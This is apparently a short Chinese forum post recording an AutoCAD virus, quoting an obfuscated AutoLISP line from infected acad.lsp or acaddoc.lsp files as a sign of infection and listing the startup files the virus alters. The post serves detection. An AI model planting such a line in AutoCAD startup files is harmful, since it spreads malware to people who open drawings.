AutoCAD的病毒记录
1. 在目录中自动增加acad.lsp或acaddoc.lsp,并在文件中能搜索到如下字符:(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))
表示已经中毒。
这行代码的意思就是搜索CAD支持路径下是否有logo.gif文件,如有,则复制logo.gif文件到CAD支持路径并重命名为acad.vlx。
这个病毒能修改的文件包括 ai_utils.lsp 和 acad.mnl ,以及前文提到的acad.lsp和acaddoc.lsp,以及自动生成acad.vls 。
页:
[1]